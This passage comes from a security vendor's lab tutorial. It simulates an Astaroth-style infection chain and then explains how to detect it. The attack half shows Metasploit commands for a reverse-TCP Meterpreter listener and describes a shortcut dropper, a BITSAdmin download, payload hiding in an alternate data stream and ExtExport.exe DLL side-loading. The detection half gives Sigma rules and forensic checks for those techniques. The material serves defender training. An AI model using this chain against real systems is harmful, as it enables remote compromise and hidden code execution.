Here, we can specify the type of payload we wish to use, and allow us to configure the IP address and port where Metasploit will be listening:<\/p>\n<pre><code class=\"language-bash\"># Define the payload used:\nset PAYLOAD windows\/meterpreter\/reverse_tcp\n\n# Define the listening host:\nset LHOST &lt;OUR_IP&gt;\n\n# Define the listening port:\nset LPORT 4444\n\n# Start the handler:\nexploit<\/code><\/pre>\n<p>The description of the payload we have chosen reads &quot;Windows Meterpreter (Reflective Injection), Reverse TCP Stager&quot;, which means that this is a Meterpreter implant that communicates back to the Metasploit server over the TCP protocol.<\/p>\n<p>Metasploit uses a specific naming convention for payloads:<\/p>\n<pre><code class=\"language-bash\">&lt;platform&gt; \/ &lt;architecture&gt; \/ &lt;payload type&gt; \/ &lt;communication type&gt;<\/code><\/pre>\n<p>Meterpreter is Metasploit&#x27;s standard implant, and its definition is the following (kindly borrowed from <a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/about-meterpreter\" target=\"_blank\" rel=\"noopener\">Offensive Security<\/a>):<\/p>\n<p>Meterpreter is an advanced, dynamically-extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. 
It features command history, tab completion, channels, and more.<\/p>\n<p>The C2 framework is now ready to receive connections.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/metasploit-meterpreter-listener.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>6 &#8211; Attack Execution<\/h3>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/adf-code-exec-astaroth-edit2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Now that all the pieces are in place, we are ready to carry out the attack. To do so, we just need to follow the steps detailed below:<\/p>\n<p>&#8211;<\/p>\n<p>First, move the &quot;create_dropper_lnk.bat&quot; batch file to the Windows VM that will act as the target (any directory is fine) and execute it. This will create a shortcut file named &quot;clickme.lnk&quot; that will imitate the Infection Vector in the real attack. Use an isolated, snapshotted VM for this: the later stages of the chain are exactly what the Windows Defender ExtExport.exe behaviour detection discussed in the Detection section looks for, so expect it to interrupt the lab unless that protection is adjusted for the exercise.<\/p>\n<p>&#8211;<\/p>\n<p>On the attacking machine, move to the directory where the payloads are stored and set up an HTTP server as described above.<\/p>\n<p>&#8211;<\/p>\n<p>Open up a Metasploit console and set up a listener for a reverse Meterpreter shell over TCP, again following the steps already outlined.<\/p>\n<p>&#8211;<\/p>\n<p>Back on the target machine, it is time for the user to click on that completely benign-looking file. This will trigger the whole attack chain.<\/p>\n<p>&#8211;<\/p>\n<p>Turns out the &quot;clickme&quot; shortcut file is a dropper &#8211; who would have thought! When opened, the shortcut runs a command that uses BITSAdmin to fetch the next step of the attack chain, a stager batch file. 
This stager gets automatically executed and performs the following actions:<\/p>\n<p>&#8211;<\/p>\n<p>First it reaches back to our C2 server, retrieves our DLL payload over the HTTP server we started earlier, renames it and stores it in &quot;C:\\Users\\Public\\Libraries\\raw\\&quot;.<\/p>\n<p>&#8211;<\/p>\n<p>Second, it generates a VBS script and copies it to an Alternate Data Stream of &quot;desktop.ini&quot; inside the same directory, hiding it from Explorer and from a plain directory listing (though not from dir \/R, Sysmon stream-creation events or the tools covered in the Detection section). The original script is immediately deleted.<\/p>\n<p>&#8211;<\/p>\n<p>This now hidden script is accessed and executed by the stager, creating the final launcher file in shortcut format (.lnk).<\/p>\n<p>&#8211;<\/p>\n<p>Almost there! In its final step, the stager executes the shortcut file, which launches ExtExport.exe &#8211; a LOLBin bundled in Internet Explorer &#8211; pointing to the directory where the suitably-renamed DLL payload is stored. If successful, the DLL is side-loaded and the embedded payload is executed.<\/p>\n<p>&#8211;<\/p>\n<p>Voila! A Meterpreter session appears in the terminal of our attacking machine. Good job!<\/p>\n<h2>Detection<\/h2>\n<p>We are now aware of how the attackers behind the Astaroth campaign conducted a large part of their operation. 
So how do we detect them?<\/p>\n<p>The following section describes some of the ways in which the abuse of the techniques we just discussed can be detected, with a few insights into some of the implementations Countercept used when facing this threat.<\/p>\n<p>Most of the tools we are going to use to this end can be categorised as one of the following types:<\/p>\n<ul>\n<li>Event Logs<\/li>\n<li>Stand Alone Tools and Scripts<\/li>\n<li>Sigma Rules<\/li>\n<\/ul>\n<p>Apart from the event logs, to follow along with some of the examples we recommend installing the following tools:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/sigma#sigmac\" target=\"_blank\" rel=\"noopener\">Sigma &#8211; Sigmac<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a> (SwiftOnSecurity&#x27;s <a href=\"https:\/\/github.com\/SwiftOnSecurity\/sysmon-config\" target=\"_blank\" rel=\"noopener\">config<\/a> will serve us well here)<\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/streams\" target=\"_blank\" rel=\"noopener\">Streams<\/a><\/li>\n<\/ul>\n<h3>BITSAdmin<\/h3>\n<p>As explained in the introduction, although initially designed for download and upload jobs, BITSAdmin can actually be abused by an attacker for a number of different tasks. In the next section we describe some ways in which some of these malicious actions can be detected.<\/p>\n<h3>SC Query<\/h3>\n<p>bitsadmin.exe is only a client: the transfers themselves are carried out by the Background Intelligent Transfer Service (BITS), which has to be running for a job to exist. A quick way to check whether it is active is to query it with the sc command.<\/p>\n<pre><code class=\"language-bash\">sc query bits<\/code><\/pre>\n<p>We could also use events with an EID of 7036 (System log, source Service Control Manager) for the BITS service entering a running state. Bear in mind that BITS is also used by Windows Update and other legitimate components, so the service being active is a weak signal on its own and is mostly useful for building a timeline.<\/p>\n<h3>QMGR Database<\/h3>\n<p>The Queue Manager Database (QMGR) is a database that stores the records of all the executed BITS jobs. 
It can be found in:<\/p>\n<pre><code class=\"language-bash\">C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db<\/code><\/pre>\n<p>Unfortunately the database is a binary format rather than plain text, but a quick workaround to get some useful information from it is to search it for &quot;http&quot;, which yields the URLs of the files that have been downloaded through BITS. Strings inside the file may be stored as UTF-16, so if a plain grep returns nothing try a UTF-16-aware search (for example strings -e l qmgr.db | grep http). The file may also be locked while the BITS service is running, in which case copy it from a forensic image or a volume shadow copy first.<\/p>\n<h3>Sigma Rules<\/h3>\n<p>There are a few already made Sigma rules that cover detection for some of the use cases mentioned above. Here we are going to talk about two of the ones we consider most useful for general purposes.<\/p>\n<h3>BITSAdmin Download<\/h3>\n<p>This first <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/1b42f2a0e29593d4a1d08f89d87e73fb95d7626c\/rules\/windows\/process_creation\/win_process_creation_bitsadmin_download.yml\" target=\"_blank\" rel=\"noopener\">rule<\/a> is the most useful for the scenario described in the lab. It detects every instance of BITSAdmin using the \/transfer flag to download a file. Note that a job can also be built up with the \/create, \/addfile and \/resume switches instead of \/transfer, which this rule would not match; the BITS-Client event log described below catches both forms.<\/p>\n<pre><code class=\"language-bash\">title: Bitsadmin Download\nid: d059842b-6b9d-4ed1-b5c3-5b89143c6ede\nstatus: experimental\ndescription: Detects usage of bitsadmin downloading a file\nreferences:\n- https:\/\/blog.netspi.com\/15-ways-to-download-a-file\/#bitsadmin\n- https:\/\/isc.sans.edu\/diary\/22264\ntags:\n- attack.defense_evasion\n- attack.persistence\n- attack.t1197\n- attack.s0190\ndate: 2017\/03\/09\nmodified: 2019\/12\/06\nauthor: Michael Haag\nlogsource:\ncategory: process_creation\nproduct: windows\ndetection:\nselection1:\nImage:\n- &#x27;*\\bitsadmin.exe&#x27;\nCommandLine:\n- &#x27;* \/transfer *&#x27;\nselection2:\nCommandLine:\n- &#x27;*copy bitsadmin.exe*&#x27;\ncondition: selection1 or selection2\nfields:\n- CommandLine\n- ParentCommandLine\nfalsepositives:\n- Some legitimate apps use this, but limited.\nlevel: medium<\/code><\/pre>\n<h3>BITSAdmin via PowerShell<\/h3>\n<p>Another use case for BITSAdmin we have not spoken about 
yet is using the following PowerShell cmdlet to start a job. This cmdlet talks to the BITS service directly and never spawns bitsadmin.exe, so the process-creation rule above would not see it.<\/p>\n<pre><code class=\"language-bash\">Start-BitsTransfer<\/code><\/pre>\n<p>For example, using:<\/p>\n<pre><code class=\"language-bash\">Start-BitsTransfer -Source &lt;source_url&gt; -Destination &lt;destination_path&gt;<\/code><\/pre>\n<p>This next <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/48d95f027c9e196ef1e6b37416ec4f89beb0aaf5\/rules\/windows\/process_creation\/win_powershell_bitsjob.yml\" target=\"_blank\" rel=\"noopener\">rule<\/a> would cover us in such scenarios.<\/p>\n<pre><code class=\"language-bash\">title: Suspicious Bitsadmin Job via PowerShell\nid: f67dbfce-93bc-440d-86ad-a95ae8858c90\nstatus: experimental\ndescription: Detect download by BITS jobs via PowerShell\nreferences:\n- https:\/\/eqllib.readthedocs.io\/en\/latest\/analytics\/ec5180c9-721a-460f-bddc-27539a284273.html\n- https:\/\/github.com\/redcanaryco\/atomic-red-team\/blob\/master\/atomics\/T1197\/T1197.md\nauthor: Endgame, JHasenbusch (ported to sigma for oscd.community)\ndate: 2018\/10\/30\nmodified: 2019\/11\/11\ntags:\n- attack.defense_evasion\n- attack.persistence\n- attack.t1197\nlogsource:\ncategory: process_creation\nproduct: windows\ndetection:\nselection:\nImage|endswith: &#x27;\\powershell.exe&#x27;\nCommandLine|contains: &#x27;Start-BitsTransfer&#x27;\ncondition: selection\nfields:\n- ComputerName\n- User\n- CommandLine\nfalsepositives:\n- Unknown\nlevel: medium<\/code><\/pre>\n<p>Two limitations are worth knowing before relying on it: the rule only matches the Windows PowerShell binary, so add an entry for pwsh.exe if PowerShell 7 is deployed in the estate, and it only inspects the process command line, so a call made from inside a script file or via an encoded command would be missed unless Script Block Logging (Event ID 4104) is also monitored.<\/p>\n<h3>Event Logs<\/h3>\n<p>The following event log contains the download state, source, user and file information for each BITS transfer job carried out on a system:<\/p>\n<ul>\n<li>The Microsoft-Windows-BITS-Client\/Operational channel (stored on disk under %SystemRoot%\\System32\\winevt\\Logs)<\/li>\n<\/ul>\n<p>Depending on existing coverage, it might be worth ingesting this log and monitoring for these BITS events, which are written regardless of whether the job was created with bitsadmin.exe, PowerShell or the API directly. To filter down the high amount of events, it is worth looking for event ID 59. 
This will show information on the URL the BITS job connected to.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/bitsadmin-evtx.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>In many cases, any connection to a non-local address will justify investigation, and this can be further correlated with threat intelligence feeds to add more context to the alerts, for example. BITS downloads also carry a distinctive User-Agent header that contains &quot;BITS&quot; (typically Microsoft BITS\/&lt;version&gt;). Ingesting web proxy logs and filtering on this User Agent would allow you to identify all hosts talking externally through this LOLBin; bear in mind that Windows Update and other legitimate components use BITS too, so the destination matters more than the agent string itself.<\/p>\n<h3>ExtExport.exe<\/h3>\n<h3>Windows Defender<\/h3>\n<p>Windows Defender has a behaviour-based detection for suspicious use of the ExtExport.exe binary (Behavior:Win32\/ExtExportAbuse.B).<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/windefender-alert-extexportabuse.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>However, as we have seen this is often not enough, so it is a good idea to add some detection of our own.<\/p>\n<h3>Sigma Rule<\/h3>\n<p>ExtExport.exe process execution is quite unusual, so that in itself could be enough of an indicator worth checking. For more accuracy, we could also check the parameters, especially if a path is given, followed by two additional random arguments.<\/p>\n<p>A homemade Sigma rule could look as follows:<\/p>\n<pre><code class=\"language-bash\">title: ExtExport.exe DLL Side Loading\nid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\nstatus: experimental\ndescription: Detects ExtExport.exe with arguments being executed. 
Could indicate a DLL Side-Loading attempt.\nreferences:\n- https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Extexport\/\n- http:\/\/www.hexacorn.com\/blog\/2018\/04\/24\/extexport-yet-another-lolbin\/\ntags:\n- attack.execution\n- attack.defense_evasion\n- attack.t1059\n- attack.t1073\nauthor: Martin, Anartz\ndate: 2020\/06\/30\nlogsource:\ncategory: process_creation\nproduct: windows\ndetection:\nselection:\nImage:\n- &#x27;*\\extexport.exe&#x27;\nfilter:\nCommandLine:\n- &#x27;^[Cc]\\:\\\\[Pp]rogram\\ [Ff]iles(\\ \\([Xx]86\\))?\\\\[Ii]nternet\\ [Ee]xplorer\\\\[Ee]xt[Ee]xport\\.exe$&#x27;\ncondition: selection and not filter\nfields:\n- CommandLine\nfalsepositives:\n- Depending on the estate activity. They should be rare.\nlevel: medium<\/code><\/pre>\n<p>Before deploying it, note three things about the rule as written. First, Sigma treats a plain string value as a wildcard pattern, not a regular expression, so the filter above (which relies on ^, $ and escaped characters) needs the re modifier (CommandLine|re:) to be interpreted as a regex; without it the filter never matches and the rule fires on every ExtExport.exe execution, including the bare no-argument case it was meant to exclude. Second, the YAML nesting of the rules on this page has been flattened in rendering, so restore the indentation under logsource and detection before feeding them to sigmac. Third, the side-loading tag attack.t1073 has since been retired by MITRE in favour of T1574.002 (Hijack Execution Flow: DLL Side-Loading). The rule should then be further refined by baselining it against the usual activity in the estate, whitelisting any legitimate use case for this binary.<\/p>\n<p>The next image shows a successful detection for suspicious ExtExport.exe use, done by our managed detection and response solution.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/extexport-detection.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Alternate Data Stream (ADS)<\/h3>\n<h3>Dir Command<\/h3>\n<p>If we are already suspicious of a specific file, one of the easiest, most straightforward ways of confirming if there is a rogue ADS in it is to run a dir \/R command on the directory the file is in.<\/p>\n<pre><code class=\"language-bash\">dir \/R &lt;target_directory&gt;<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/stager-dir2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Of course, this is certainly not the situation we are most commonly in, and we ideally want to develop detection mechanisms that will alert us of an attack upon execution.<\/p>\n<h3>Tools and 
Scripts<\/h3>\n<p>The main problem when it comes to ADS is that there are a great variety of file formats that can be stored in the alternate data stream of a given file. This means there are also many ways of executing a hidden payload and, therefore, different execution detection mechanisms to use depending on the scenario. Additionally, the reported size (and hash!) of the file containing the ADS payload does not change after our malicious file is added.<\/p>\n<p>However, there are some tools at our disposal that can help us automate and speed up the process of recursively gathering all the data streams in a given directory.<\/p>\n<p><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/streams\" target=\"_blank\" rel=\"noopener\">Streams<\/a> is a tool in the Sysinternals suite that examines a given file or directory and returns a list of the names and sizes of any ADS it encounters. A nice touch is that it also allows us to delete the streams with the &quot;-d&quot; flag.<\/p>\n<pre><code class=\"language-bash\">streams [-s] [-d] &lt;file_or_directory&gt;<\/code><\/pre>\n<p>In a similar manner, the PowerShell scripts <a href=\"https:\/\/github.com\/forgottentq\/powershell\/blob\/master\/find-steams.ps1\" target=\"_blank\" rel=\"noopener\">find-steams.ps1<\/a> and <a href=\"https:\/\/github.com\/p0shkatz\/Get-ADS\" target=\"_blank\" rel=\"noopener\">Get-ADS.ps1<\/a> provide similar functionality, and they may be easier to automate.<\/p>\n<h3>Sigma Rule<\/h3>\n<p>For a less forensic and more active detection approach, you can feed the following Sigma <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/powershell\/powershell_ntfs_ads_access.yml\" target=\"_blank\" rel=\"noopener\">rule<\/a> into your SIEM and monitor for data written into NTFS ADS (with the caveats that it only detects it when it spawns from a PowerShell process and that Script Block Logging needs to be active).<\/p>\n<pre><code 
class=\"language-bash\">title: NTFS Alternate Data Stream\nid: 8c521530-5169-495d-a199-0a3a881ad24e\nstatus: experimental\ndescription: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.\nreferences:\n- http:\/\/www.powertheshell.com\/ntfsstreams\/\ntags:\n- attack.defense_evasion\n- attack.t1096\n- attack.t1564.004\nauthor: Sami Ruohonen\ndate: 2018\/07\/24\nlogsource:\nproduct: windows\nservice: powershell\ndefinition: &#x27;It is recommended to use the new &quot;Script Block Logging&quot; of PowerShell v5 https:\/\/adsecurity.org\/?p=2277&#x27;\ndetection:\nkeyword1:\n- &quot;set-content&quot;\n- &quot;add-content&quot;\nkeyword2:\n- &quot;-stream&quot;\ncondition: keyword1 and keyword2\nfalsepositives:\n- unknown\nlevel: high<\/code><\/pre>\n<p>Keep in mind that this rule only covers the PowerShell cmdlet route: the stager batch file in this lab writes the stream without PowerShell at all, so it would leave no trace in the PowerShell log. Treat the rule as one signal among several rather than as ADS coverage on its own.<\/p>\n<p>A more generic approach to detect code execution using ADS, like the one we use currently, involves monitoring for a known list of usual suspect processes running a binary or script in an ADS by parsing the image name and checking if the arguments are in ADS format and contain a file in them (have a colon &quot;:&quot; and a known extension), together with various whitelisting filters resulting from some exhaustive baselining.<\/p>\n<h3>Sysmon<\/h3>\n<p>Finally, it is also worth mentioning that Sysmon also offers ADS creation logging <a href=\"https:\/\/www.dshield.org\/forums\/diary\/Sysmon+and+Alternate+Data+Streams\/26292\/\" target=\"_blank\" rel=\"noopener\">capability<\/a> (Event ID 15, FileCreateStreamHash, which records the stream name and a hash of its contents and so catches the write regardless of which process performed it), although this might require a decent amount of fine tuning to make the amount of data it generates manageable.<\/p>\n<h2>Conclusions<\/h2>\n<p>The main goal of this lab was to present the reader with a simplified version of a real world threat in order to give an engaging and holistic view of the whole attack and defence cycle. 
We observed the use of several code execution techniques, including the use of LOLBins and Alternate Data Streams, and identified detection opportunities both from a forensic perspective and in terms of active monitoring. Several Sigma rules have been provided that seek to detect the offensive actions we performed.<\/p>\n<p>The main takeaways from this first lab are:<\/p>\n<ul>\n<li>An opportunity to simulate an, albeit slightly simplified, code execution flow of real-world Astaroth malware.<\/li>\n<li>The use of process creation events for specific command line entries relating to the creation of alternate data streams, and BITSAdmin.<\/li>\n<li>Use of additional tooling to identify instances of ADS and BITS jobs.<\/li>\n<\/ul>\n<p>In the next lab, we&#x27;ll adapt our malware to include persistence mechanisms. You can find the guide for that lab <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a 
<\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>For this first lab we are going to carry out a simplified simulation of a real Astaroth compromise, much like the ones we have detected. <\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[310,380,312],"labs_content_type":[313],"class_list":["post-10574","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-offensive-security","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div 
class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">For this first lab we are going to carry out a simplified simulation of a real Astaroth compromise, much like the ones we have detected. <\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\">Mehr erfahren<\/a>            <\/div>\n            
<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item\/10574","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/media?parent=10574"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/categories?post=10574"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/labs_content_type?post=10574"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
